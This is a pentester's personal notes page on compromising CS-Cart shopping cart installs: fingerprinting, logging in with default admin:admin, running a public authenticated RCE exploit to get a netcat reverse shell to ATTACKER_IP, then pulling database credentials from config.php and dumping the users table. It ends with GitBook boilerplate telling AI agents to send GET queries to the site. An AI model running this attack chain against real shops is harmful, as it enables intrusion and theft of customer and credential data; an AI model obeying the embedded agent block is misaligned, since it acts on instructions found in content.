> For the complete documentation index, see [llms.txt](https://book.ice-wzl.xyz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://book.ice-wzl.xyz/things-i-have-pwnd-before/cs-cart.md). # CS-Cart CS-Cart is PHP shopping cart software. Older exposed installs may allow admin login with default credentials and authenticated RCE through public exploit tooling. ## Discovery Useful indicators: ``` 80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6) |_http-title: CS-Cart. Powerful PHP shopping cart software ``` WhatWeb may show: ``` Apache[2.2.4], CS-Cart, PHP[5.2.3-1ubuntu6], PasswordField[password], Title[CS-Cart. Powerful PHP shopping cart software] ``` Useful application paths: ``` http://TARGET/index.php?target=sitemap http://TARGET/index.php?target=profiles&mode=update ``` ## Default Admin Login Try the default admin credentials: ``` admin:admin ``` ## Authenticated RCE Public exploit used: ``` https://github.com/reatva/CS-Cart-1.3.3-RCE ``` Start a listener: ```bash nc -nlvp 80 ``` Run the exploit with the working admin credentials: ```bash python3 Cs-Cart.py -U http://TARGET -u admin -p admin -L ATTACKER_IP -P 80 ``` Successful output: ``` [+] Login Successful [+] Payload uploaded successfully. [+] Open up netcat to receive reverse shell on ATTACKER_IP:80 ``` Successful shell context: ``` uid=33(www-data) gid=33(www-data) groups=33(www-data) pwd /var/www/skins ``` ## Database Credentials CS-Cart database credentials may be in `config.php`: ```php $db_host = 'localhost'; $db_name = 'cscart'; $db_user = 'root'; $db_password = 'root'; ``` Connect locally from the target: ```bash mysql -u root -h localhost -p ``` Useful database enumeration: ```sql show databases; use cscart; show tables; select * from cscart_users\G ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://book.ice-wzl.xyz/things-i-have-pwnd-before/cs-cart.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.